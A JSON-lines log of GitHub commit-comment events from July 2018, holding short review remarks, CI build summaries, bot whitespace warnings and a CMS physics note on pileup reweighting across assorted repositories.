{"id":"7954282716","type":"CommitCommentEvent","actor":{"login":"anmalara"},"repo":{"name":"UHH2/UHH2"},"payload":{"comment":{"id":29680887,"position":null,"line":null,"path":null,"commit_id":"f07639a3fd5796b5db61d32d5e7e471bd6be994f","created_at":"2018-07-12T06:53:11Z","updated_at":"2018-07-12T06:53:11Z","author_association":"NONE","body":"Golden JSON file [a] used  according to [1]\r\nPileUp JSON file [b] used according to [2]\r\nTotal inelastic cross-section used 69.2 +- 4.6% according to [3]\r\n\r\nFor the MC distribution:\r\nGiven the announcement in [4], the temporary solution is to use a derived distribution. This has\u001b fluctuations in the tails, but still, describe better the nPU distribution for MC wrt the original generating PU distribution. \r\nThis is meant to be used as a preliminary step. If the analysis is particularly sensitive to PU reweighing, you should either exclude pu<10 && pu>75 [2] or calculate for each MC sample your own distribution and process it (N.B. tail fluctuations depends on the particular sample not only on the generating process (QCD, TT,...) )\r\nThe MC file produced has been processed from all QCD-PtBinned, TTTo2L2Nu, TTToHadronic and TTToSemiLeptonic.\r\n\r\n[1] https://hypernews.cern.ch/HyperNews/CMS/get/physics-validation/3067.html\r\n[2] https://hypernews.cern.ch/HyperNews/CMS/get/physics-validation/3073.html\r\n[3] https://hypernews.cern.ch/HyperNews/CMS/get/luminosity/613/2/1/1/1.html \r\n[4] https://hypernews.cern.ch/HyperNews/CMS/get/physics-validation/3128.html\r\n[5]https://indico.cern.ch/event/695872/contributions/2877123/attachments/1593469/2522749/pileup_ppd_feb_2018.pdf\r\n\r\n\r\n[a] /afs/cern.ch/cms/CAF/CMSCOMM/COMM_DQM/certification/Collisions17/13TeV/ReReco/Cert_294927-306462_13TeV_EOY2017ReReco_Collisions17_JSON_v1.txt\r\n[b] /afs/cern.ch/cms/CAF/CMSCOMM/COMM_DQM/certification/Collisions17/13TeV/PileUp/pileup_latest.txt "}},"created_at":"2018-07-12T06:53:11Z"}
{"id":"7954284679","type":"CommitCommentEvent","actor":{"login":"FKDDGDDD"},"repo":{"name":"wshata/Pro"},"payload":{"comment":{"id":29680891,"position":null,"line":null,"path":null,"commit_id":"ee6d316d352909c68b5861d78300dced6ec9f673","created_at":"2018-07-12T06:53:45Z","updated_at":"2018-07-12T06:53:45Z","author_association":"CONTRIBUTOR","body":"chenyu7-12"}},"created_at":"2018-07-12T06:53:45Z"}
{"id":"7954287127","type":"CommitCommentEvent","actor":{"login":"jflute"},"repo":{"name":"dbflute/dbflute-core"},"payload":{"comment":{"id":29680893,"position":18,"line":59,"path":"dbflute-engine/embedded/templates/om/java/allcommon/container/spring/SpringDBFluteBeansJavaConfig.vm","commit_id":"454ddc2dc0c770049877ca8b6a002aba15f7dd67","created_at":"2018-07-12T06:54:24Z","updated_at":"2018-07-12T06:54:24Z","author_association":"COLLABORATOR","body":"remove \"name=\" at next commit"}},"created_at":"2018-07-12T06:54:24Z"}
{"id":"7954292639","type":"CommitCommentEvent","actor":{"login":"ken-kentan"},"repo":{"name":"ken-kentan/student-portal-plus"},"payload":{"comment":{"id":29680901,"position":86,"line":165,"path":"app/src/main/java/jp/kentan/studentportalplus/notification/NotificationController.kt","commit_id":"86fc44a099eaaffa2507327aa407b705101bc282","created_at":"2018-07-12T06:55:49Z","updated_at":"2018-07-12T06:55:49Z","author_association":"OWNER","body":"なにこれ"}},"created_at":"2018-07-12T06:55:49Z"}
{"id":"7954294733","type":"CommitCommentEvent","actor":{"login":"prasanthdk"},"repo":{"name":"prasanthdk/rsum"},"payload":{"comment":{"id":29680905,"position":null,"line":null,"path":null,"commit_id":"7bd59665dbe1038397d565f723c3cd0d91407ad7","created_at":"2018-07-12T06:56:23Z","updated_at":"2018-07-12T06:56:23Z","author_association":"OWNER","body":"Test"}},"created_at":"2018-07-12T06:56:23Z"}
{"id":"7954297894","type":"CommitCommentEvent","actor":{"login":"niksarkhedi"},"repo":{"name":"adeen-s/opensource-workshop-attendance"},"payload":{"comment":{"id":29680910,"position":1,"line":1,"path":"attendees.md","commit_id":"d571f9483f65d6d098d2630d4cfb77c241feb69c","created_at":"2018-07-12T06:57:14Z","updated_at":"2018-07-12T06:57:14Z","author_association":"NONE","body":"Nikhil Sarkhedi-160303105295"}},"created_at":"2018-07-12T06:57:14Z"}
{"id":"7954300281","type":"CommitCommentEvent","actor":{"login":"matetami96"},"repo":{"name":"matetami96/hello-world"},"payload":{"comment":{"id":29680911,"position":null,"line":null,"path":null,"commit_id":"2a13ab44f37e67b26ad84404942d88b86ffbbd3f","created_at":"2018-07-12T06:57:51Z","updated_at":"2018-07-12T06:57:51Z","author_association":"OWNER","body":"Yo"}},"created_at":"2018-07-12T06:57:51Z"}
{"id":"7954301971","type":"CommitCommentEvent","actor":{"login":"niksarkhedi"},"repo":{"name":"adeen-s/opensource-workshop-attendance"},"payload":{"comment":{"id":29680913,"position":null,"line":null,"path":null,"commit_id":"d571f9483f65d6d098d2630d4cfb77c241feb69c","created_at":"2018-07-12T06:58:17Z","updated_at":"2018-07-12T06:58:17Z","author_association":"NONE","body":"Nikhil Sarkhedi-160303105295"}},"created_at":"2018-07-12T06:58:17Z"}
{"id":"7954303190","type":"CommitCommentEvent","actor":{"login":"shanselman"},"repo":{"name":"NuKeeperDotNet/NuKeeper"},"payload":{"comment":{"id":29680916,"position":16,"line":38,"path":"NuKeeper/NuGet/Process/DotNetUpdatePackageCommand.cs","commit_id":"18ea76799886d41c544d61f2f295b5d47132259d","created_at":"2018-07-12T06:58:36Z","updated_at":"2018-07-12T06:58:36Z","author_association":"NONE","body":"I think (please forgive my ignorance here) that these are reversed?\r\n\r\n> await _externalProcess.Run(projectPath, \"dotnet\", $\"restore {sources} {projectFileName}\", true); \r\n"}},"created_at":"2018-07-12T06:58:36Z"}
{"id":"7954310664","type":"CommitCommentEvent","actor":{"login":"candy-lx"},"repo":{"name":"candy-lx/vanke"},"payload":{"comment":{"id":29680934,"position":null,"line":null,"path":null,"commit_id":"50d6235ab7c51ea35ba142bd543e0ed7ee998659","created_at":"2018-07-12T07:00:27Z","updated_at":"2018-07-12T07:00:27Z","author_association":"OWNER","body":"ttt"}},"created_at":"2018-07-12T07:00:27Z"}
{"id":"7954315955","type":"CommitCommentEvent","actor":{"login":"wfxiang08"},"repo":{"name":"wfxiang08/gh-ost"},"payload":{"comment":{"id":29680941,"position":5,"line":80,"path":"go/base/context.go","commit_id":"82cc41962ef0f5f3f6f4b9806a9141c011fc1dfe","created_at":"2018-07-12T07:01:44Z","updated_at":"2018-07-12T07:01:44Z","author_association":"OWNER","body":"新增加的filter条件"}},"created_at":"2018-07-12T07:01:44Z"}
{"id":"7954316264","type":"CommitCommentEvent","actor":{"login":"skolima"},"repo":{"name":"NuKeeperDotNet/NuKeeper"},"payload":{"comment":{"id":29680942,"position":16,"line":38,"path":"NuKeeper/NuGet/Process/DotNetUpdatePackageCommand.cs","commit_id":"18ea76799886d41c544d61f2f295b5d47132259d","created_at":"2018-07-12T07:01:49Z","updated_at":"2018-07-12T07:01:49Z","author_association":"COLLABORATOR","body":"That bit is (I think) fine - the dotnet command lines are a bit inconsistent with their syntax sometimes. https://docs.microsoft.com/en-us/dotnet/core/tools/dotnet-restore?tabs=netcore2x The catch is that the way `sources` switches are generated doesn't handle whitespace."}},"created_at":"2018-07-12T07:01:49Z"}
{"id":"7954321941","type":"CommitCommentEvent","actor":{"login":"bfred-it"},"repo":{"name":"sindresorhus/refined-github"},"payload":{"comment":{"id":29680951,"position":null,"line":null,"path":null,"commit_id":"1463a75034e98f29c9ca5d88987d78e8db900945","created_at":"2018-07-12T07:03:17Z","updated_at":"2018-07-12T07:03:17Z","author_association":"COLLABORATOR","body":"I think we can just leave it plural "}},"created_at":"2018-07-12T07:03:17Z"}
{"id":"7954321956","type":"CommitCommentEvent","actor":{"login":"wfxiang08"},"repo":{"name":"wfxiang08/gh-ost"},"payload":{"comment":{"id":29680952,"position":6,"line":29,"path":"go/binlog/gomysql_reader.go","commit_id":"82cc41962ef0f5f3f6f4b9806a9141c011fc1dfe","created_at":"2018-07-12T07:03:17Z","updated_at":"2018-07-12T07:03:17Z","author_association":"OWNER","body":"新增字段"}},"created_at":"2018-07-12T07:03:17Z"}
{"id":"7954323403","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29680959,"position":null,"line":null,"path":null,"commit_id":"b8163aa823feb21ab3f3d5e46330cd3d569fd75c","created_at":"2018-07-12T07:03:40Z","updated_at":"2018-07-12T07:03:40Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2940 of 2966 tests passed, 16 test warnings)\n\nMessages:\n\n * 14 tests had: AUD diffs.\n * 13 tests had: EIO diffs.\n * 4 tests had: ESO small diffs.\n * 4 tests had: Table small diffs.\n * 1 test had: BND diffs.\n * 9 tests had: ESO big diffs.\n * 6 tests had: Table big diffs.\n * 2 tests had: MTD diffs.\n * 4 tests had: MTR big diffs.\n * 2 tests had: MTR small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 634\n * Failed: 9\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8163aa823feb21ab3f3d5e46330cd3d569fd75c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8163aa823feb21ab3f3d5e46330cd3d569fd75c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.12%25-yellow.png)</a> \n"}},"created_at":"2018-07-12T07:03:40Z"}
{"id":"7954324570","type":"CommitCommentEvent","actor":{"login":"fridim"},"repo":{"name":"sborenst/ansible_agnostic_deployer"},"payload":{"comment":{"id":29680960,"position":null,"line":null,"path":null,"commit_id":"0df2eb6a33c22ef3b00b115dc7e1faaf76150a09","created_at":"2018-07-12T07:03:58Z","updated_at":"2018-07-12T07:03:58Z","author_association":"COLLABORATOR","body":"It is, in `post_workload.yml`"}},"created_at":"2018-07-12T07:03:58Z"}
{"id":"7954326055","type":"CommitCommentEvent","actor":{"login":"wfxiang08"},"repo":{"name":"wfxiang08/gh-ost"},"payload":{"comment":{"id":29680962,"position":60,"line":85,"path":"go/cmd/gh-ost/main.go","commit_id":"82cc41962ef0f5f3f6f4b9806a9141c011fc1dfe","created_at":"2018-07-12T07:04:20Z","updated_at":"2018-07-12T07:04:20Z","author_association":"OWNER","body":"新增参数"}},"created_at":"2018-07-12T07:04:20Z"}
{"id":"7954327145","type":"CommitCommentEvent","actor":{"login":"Mvsoftwares"},"repo":{"name":"Mvsoftwares/Project-Euler"},"payload":{"comment":{"id":29680965,"position":13,"line":13,"path":"4.LargestPalindromeProduct.cpp","commit_id":"adb3414b71d1321d262ad3e5d763d6ad34ad9dfb","created_at":"2018-07-12T07:04:38Z","updated_at":"2018-07-12T07:04:38Z","author_association":"OWNER","body":"m,kjn"}},"created_at":"2018-07-12T07:04:38Z"}
{"id":"7954330669","type":"CommitCommentEvent","actor":{"login":"posener"},"repo":{"name":"jasonwbarnett/jsonfs"},"payload":{"comment":{"id":29680973,"position":48,"line":43,"path":"fs.go","commit_id":"7a6383a98b6a87ea0130a13d14f2c930ac420ae9","created_at":"2018-07-12T07:05:34Z","updated_at":"2018-07-12T07:05:34Z","author_association":"NONE","body":"https://golang.org/pkg/html/#EscapeString"}},"created_at":"2018-07-12T07:05:34Z"}
{"id":"7954333433","type":"CommitCommentEvent","actor":{"login":"tskogberg"},"repo":{"name":"barsoom/bankline_csv_import_file"},"payload":{"comment":{"id":29680980,"position":null,"line":null,"path":null,"commit_id":"3305d6310caca06a16cf6127a817d7bc89070c83","created_at":"2018-07-12T07:06:16Z","updated_at":"2018-07-12T07:06:16Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-12T07:06:16Z"}
{"id":"7954334136","type":"CommitCommentEvent","actor":{"login":"tskogberg"},"repo":{"name":"barsoom/bankline_csv_import_file"},"payload":{"comment":{"id":29680982,"position":null,"line":null,"path":null,"commit_id":"db844c7b6455165aa3e15f034a5fed2275aa8482","created_at":"2018-07-12T07:06:25Z","updated_at":"2018-07-12T07:06:25Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-12T07:06:25Z"}
{"id":"7954340765","type":"CommitCommentEvent","actor":{"login":"zdbzuishuai"},"repo":{"name":"zdbzuishuai/Hello_World"},"payload":{"comment":{"id":29680995,"position":null,"line":null,"path":null,"commit_id":"e2cde90c0dc56afaf4dfd1d35eda0577cbe6f2aa","created_at":"2018-07-12T07:08:04Z","updated_at":"2018-07-12T07:08:04Z","author_association":"OWNER","body":"I think it's OK"}},"created_at":"2018-07-12T07:08:04Z"}
{"id":"7954341063","type":"CommitCommentEvent","actor":{"login":"posener"},"repo":{"name":"jasonwbarnett/jsonfs"},"payload":{"comment":{"id":29680997,"position":418,"line":630,"path":"fs.go","commit_id":"7a6383a98b6a87ea0130a13d14f2c930ac420ae9","created_at":"2018-07-12T07:08:08Z","updated_at":"2018-07-12T07:08:08Z","author_association":"NONE","body":"Use `strings.Contains`, it might not be a full match.\r\nAn example syntax for the header: `Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8`\r\nhttps://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Accept"}},"created_at":"2018-07-12T07:08:08Z"}
{"id":"7954341415","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29680998,"position":null,"line":null,"path":null,"commit_id":"b8163aa823feb21ab3f3d5e46330cd3d569fd75c","created_at":"2018-07-12T07:08:13Z","updated_at":"2018-07-12T07:08:13Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8163aa823feb21ab3f3d5e46330cd3d569fd75c-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-12T07:08:13Z"}
{"id":"7954346739","type":"CommitCommentEvent","actor":{"login":"mahotani"},"repo":{"name":"mizuki1029/google-step-tsp"},"payload":{"comment":{"id":29681006,"position":null,"line":null,"path":null,"commit_id":"4787ea62f32648260885e86bbb62913fffa79bd1","created_at":"2018-07-12T07:09:34Z","updated_at":"2018-07-12T07:09:34Z","author_association":"COLLABORATOR","body":"添削ありがとうございます。\r\n\r\n早速double distance[][] の追加とSystem.arraycopyへの変更を試して見ました。\r\n少し計算が早くなったような気がします。\r\n\r\n\r\n谷口茉帆\r\nmail : esprit.7632@gmail.com\r\n\r\n2018年7月12日 12:04 Hayato Ito <notifications@github.com>:\r\n\r\n> お疲れ様です。いくつかコメントしました。GA 自体についてはコメントしていません。\r\n> それ以外にも\r\n>\r\n>    - インデント直したほうがよいかも。読みやすくなります。\r\n>    - java.util.Arrays を一度見ておいたほうがよいかもしれません。便利なメソッドがあります。\r\n>    - すべての箇所で array を使用していましたが、余裕があったら、java.util.ArrayList\r\n>    などの他のコレクションクラスを使用することを検討してみたほうがよいかも。そちらのほうが楽できる場面は多いです。\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/mizuki1029/google-step-tsp/commit/4787ea62f32648260885e86bbb62913fffa79bd1#commitcomment-29679537>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/Al7imA2RdAy409Ad0-EkxYgJLaEOVEvdks5uFrzagaJpZM4VMG30>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-12T07:09:34Z"}
{"id":"7954347077","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29681008,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-12T07:09:40Z","updated_at":"2018-07-12T07:09:40Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T07:09:40Z"}
{"id":"7954347875","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29681010,"position":null,"line":null,"path":null,"commit_id":"67bc972d749e978b1fe9b859a9359b061af7275a","created_at":"2018-07-12T07:09:51Z","updated_at":"2018-07-12T07:09:51Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/emoji-typing-menu-half-out-the-screen-on-smartphone/91662/9\n"}},"created_at":"2018-07-12T07:09:51Z"}
{"id":"7954349375","type":"CommitCommentEvent","actor":{"login":"circuuz"},"repo":{"name":"triggerfishab/uniflex"},"payload":{"comment":{"id":29681014,"position":5,"line":184,"path":"wp-content/themes/uniflex/assets/js/parts/job-archive.js","commit_id":"4262e5f646ca60e283b1d68ac28d41d617cbe847","created_at":"2018-07-12T07:10:14Z","updated_at":"2018-07-12T07:10:14Z","author_association":"MEMBER","body":"Tänk på att undvika att använda `.html()` och istället försökt använda `.text()` där html inte behöver output:as."}},"created_at":"2018-07-12T07:10:14Z"}
{"id":"7954349401","type":"CommitCommentEvent","actor":{"login":"posener"},"repo":{"name":"jasonwbarnett/jsonfs"},"payload":{"comment":{"id":29681015,"position":132,"line":121,"path":"fs.go","commit_id":"7a6383a98b6a87ea0130a13d14f2c930ac420ae9","created_at":"2018-07-12T07:10:14Z","updated_at":"2018-07-12T07:10:14Z","author_association":"NONE","body":"```go\r\nfile := jsonDirItem{\r\n    Name: d.Name()\r\n    Type: fileType(d)\r\n    ModTime: d.ModTime()\r\n}\r\n```"}},"created_at":"2018-07-12T07:10:14Z"}
{"id":"7954354865","type":"CommitCommentEvent","actor":{"login":"posener"},"repo":{"name":"jasonwbarnett/jsonfs"},"payload":{"comment":{"id":29681023,"position":145,"line":134,"path":"fs.go","commit_id":"7a6383a98b6a87ea0130a13d14f2c930ac420ae9","created_at":"2018-07-12T07:11:38Z","updated_at":"2018-07-12T07:11:38Z","author_association":"NONE","body":"1. better use consts, and also use them in https://github.com/jasonwbarnett/jsonfs/commit/7a6383a98b6a87ea0130a13d14f2c930ac420ae9#diff-041214d9e39183e6bbc1990429823bfbR125\r\n\r\n2. More \"goish\" code:\r\n```go\r\nif fi.IsDir() {\r\n\treturn \"directory\"\r\n} \r\nreturn \"file\"\r\n```\r\nreturn"}},"created_at":"2018-07-12T07:11:38Z"}
{"id":"7954356689","type":"CommitCommentEvent","actor":{"login":"LouisonGitzinger"},"repo":{"name":"Rapacademix/redbull"},"payload":{"comment":{"id":29681033,"position":4,"line":30,"path":"api/models.py","commit_id":"bd2b97856d7ff047e4e7b4d12a7e2341709284bc","created_at":"2018-07-12T07:12:06Z","updated_at":"2018-07-12T07:12:06Z","author_association":"CONTRIBUTOR","body":"no line break"}},"created_at":"2018-07-12T07:12:06Z"}
{"id":"7954358563","type":"CommitCommentEvent","actor":{"login":"posener"},"repo":{"name":"jasonwbarnett/jsonfs"},"payload":{"comment":{"id":29681035,"position":144,"line":133,"path":"fs.go","commit_id":"7a6383a98b6a87ea0130a13d14f2c930ac420ae9","created_at":"2018-07-12T07:12:33Z","updated_at":"2018-07-12T07:12:33Z","author_association":"NONE","body":"fileTypeName"}},"created_at":"2018-07-12T07:12:33Z"}
{"id":"7954359105","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"nulll-pointer/phpmyadmin"},"payload":{"comment":{"id":29681036,"position":null,"line":null,"path":null,"commit_id":"3b4b82521be0cadf4047093bc3d7b48d04ee605e","created_at":"2018-07-12T07:12:41Z","updated_at":"2018-07-12T07:12:41Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: js/ajax.js, libraries/classes/Plugins/Auth/AuthenticationCookie.php"}},"created_at":"2018-07-12T07:12:41Z"}
{"id":"7954359222","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"nulll-pointer/phpmyadmin"},"payload":{"comment":{"id":29681038,"position":null,"line":null,"path":null,"commit_id":"dffbea0156589979b18822d21469329602a6b19c","created_at":"2018-07-12T07:12:42Z","updated_at":"2018-07-12T07:12:42Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: js/ajax.js"}},"created_at":"2018-07-12T07:12:42Z"}
{"id":"7954359328","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"nulll-pointer/phpmyadmin"},"payload":{"comment":{"id":29681039,"position":null,"line":null,"path":null,"commit_id":"9d3666abb7023d61d2c63f2fdb67d1f228df7a18","created_at":"2018-07-12T07:12:44Z","updated_at":"2018-07-12T07:12:44Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: themes/pmahomme/css/common.css.php"}},"created_at":"2018-07-12T07:12:44Z"}
{"id":"7954359532","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"nulll-pointer/phpmyadmin"},"payload":{"comment":{"id":29681040,"position":null,"line":null,"path":null,"commit_id":"786ef8933516b7f53340a384a90cff6b98d5e9fa","created_at":"2018-07-12T07:12:47Z","updated_at":"2018-07-12T07:12:47Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: libraries/classes/Plugins/Auth/AuthenticationCookie.php"}},"created_at":"2018-07-12T07:12:47Z"}
{"id":"7954361456","type":"CommitCommentEvent","actor":{"login":"TheoLechemia"},"repo":{"name":"PnX-SI/Nomenclature-api-module"},"payload":{"comment":{"id":29681045,"position":null,"line":null,"path":null,"commit_id":"1ad62531162aad39614e242c35380ddf99a3cfe7","created_at":"2018-07-12T07:13:14Z","updated_at":"2018-07-12T07:13:14Z","author_association":"CONTRIBUTOR","body":"C'est fait dans l'update des nomenclatures"}},"created_at":"2018-07-12T07:13:14Z"}
{"id":"7954362833","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29681050,"position":null,"line":null,"path":null,"commit_id":"1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd","created_at":"2018-07-12T07:13:34Z","updated_at":"2018-07-12T07:13:34Z","author_association":"NONE","body":"issue_6736 (mbadams5) - Win64-Windows-7-VisualStudio-14: OK (2932 of 2933 tests passed, 116 test warnings)\n\nMessages:\n\n * 100 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 2 tests had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n * 16 tests had: Table small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-12T07:13:34Z"}
{"id":"7954364864","type":"CommitCommentEvent","actor":{"login":"Manwithgoldeneye"},"repo":{"name":"Manwithgoldeneye/File-Upload"},"payload":{"comment":{"id":29681054,"position":null,"line":null,"path":null,"commit_id":"0f44841c04698d02a8acec8673b1722d4f872d88","created_at":"2018-07-12T07:14:05Z","updated_at":"2018-07-12T07:14:05Z","author_association":"OWNER","body":"EICAR"}},"created_at":"2018-07-12T07:14:05Z"}
{"id":"7954365058","type":"CommitCommentEvent","actor":{"login":"LouisonGitzinger"},"repo":{"name":"Rapacademix/redbull"},"payload":{"comment":{"id":29681055,"position":6,"line":32,"path":"api/models.py","commit_id":"bd2b97856d7ff047e4e7b4d12a7e2341709284bc","created_at":"2018-07-12T07:14:08Z","updated_at":"2018-07-12T07:14:08Z","author_association":"CONTRIBUTOR","body":"we can put a bigger charfield length (e.g `100`) to be safe (for items such as `rap français` or `cloud rap`"}},"created_at":"2018-07-12T07:14:08Z"}
{"id":"7954375317","type":"CommitCommentEvent","actor":{"login":"jannie-louwrens"},"repo":{"name":"UnisaProject/UnisaMyAdmin"},"payload":{"comment":{"id":29681066,"position":52,"line":38,"path":"myadmin-service-impls/student-services/src/main/java/za/ac/unisa/myadmin/student/services/controllers/StudentRestServiceImpl.java","commit_id":"895006e6d045857e18c4bc884575a501ae86d3a9","created_at":"2018-07-12T07:16:33Z","updated_at":"2018-07-12T07:16:33Z","author_association":"COLLABORATOR","body":"Is \"String firstNames\" suppose to be a list of string values because the argument name is plural it indicates to be multiple values?\r\nIn either case rename it to be \"firstName\" so that in the case of multiple values the queryparameter would read \"firstName=ABC&firstName=XXX&firstName=XYZ\" etc."}},"created_at":"2018-07-12T07:16:33Z"}
{"id":"7954377273","type":"CommitCommentEvent","actor":{"login":"myrdd"},"repo":{"name":"ansible/ansible"},"payload":{"comment":{"id":29681070,"position":61,"line":61,"path":"docs/docsite/rst/playbooks_reuse.rst","commit_id":"483df9c5f83befbef85796090c0f61de6436b130","created_at":"2018-07-12T07:17:00Z","updated_at":"2018-07-12T07:17:00Z","author_association":"CONTRIBUTOR","body":"@jimi-c What's exactly meant by this line? Could you please briefly clarify?\r\n\r\n* _**”for the target file or role name“**_\r\n  * By _”target role name“_, do you mean something like `import_role: { name: '{{ some_variable }}' }`?\r\n  * What do you mean by _”target file“_ (or _”target file name“_)?\r\n* _**”variables from inventory sources (host/group vars, etc.)“**_\r\n  * Are referring to variables defined in the `host_vars` and `group_vars` directories?\r\n  * Are you referring to any other type of variable sources, since you say _”etc.“_?\r\n\r\nThank you.\r\n\r\nPS: There's also a short discussion about this line [on reddit](https://www.reddit.com/r/ansible/comments/7ukuiy/why_isnt_ansible_distribution_usable_for_include/).\r\n\r\nPPS: ping @simanat, who [already asked](https://github.com/ansible/ansible/commit/381359a8f89f503d668fe5144e230c2d1369b364#commitcomment-28896273) this question, too.\r\n"}},"created_at":"2018-07-12T07:17:00Z"}
{"id":"7954377432","type":"CommitCommentEvent","actor":{"login":"rishabhkalra96"},"repo":{"name":"rishabhkalra96/PWA_Example"},"payload":{"comment":{"id":29681071,"position":null,"line":null,"path":null,"commit_id":"c6d831f73e0a2214c694877da6f0779c927f1b68","created_at":"2018-07-12T07:17:02Z","updated_at":"2018-07-12T07:17:02Z","author_association":"OWNER","body":"Non lifecycle events are those which are not the part of lifecycle events such as install or activate\r\nFor non lifecycle events, make sure you include event.respondWith(); method\r\nThis method takes in event.request and infact other things to return when the event is triggered\r\nThis is a good practice., as shown in the next commit"}},"created_at":"2018-07-12T07:17:02Z"}
{"id":"7954379836","type":"CommitCommentEvent","actor":{"login":"parthpandyappp"},"repo":{"name":"parthpandyappp/project1"},"payload":{"comment":{"id":29681076,"position":4,"line":8,"path":"index.html","commit_id":"59a14bda40e53dc15847002e202a6a9f318f2a0f","created_at":"2018-07-12T07:17:37Z","updated_at":"2018-07-12T07:17:37Z","author_association":"OWNER","body":"THIS IS FOR ICON INSERTION."}},"created_at":"2018-07-12T07:17:37Z"}
{"id":"7954380579","type":"CommitCommentEvent","actor":{"login":"circuuz"},"repo":{"name":"triggerfishab/uniflex"},"payload":{"comment":{"id":29681077,"position":18,"line":17,"path":"wp-content/themes/uniflex/inc/ajax-functions.php","commit_id":"4262e5f646ca60e283b1d68ac28d41d617cbe847","created_at":"2018-07-12T07:17:48Z","updated_at":"2018-07-12T07:17:48Z","author_association":"MEMBER","body":"För att andra lättare ska kunna läsa och förstå din kod, jobba alltid efter conceptet _return early_.\r\nhttps://softwareengineering.stackexchange.com/questions/18454/should-i-return-from-a-function-early-or-use-an-if-statement"}},"created_at":"2018-07-12T07:17:48Z"}
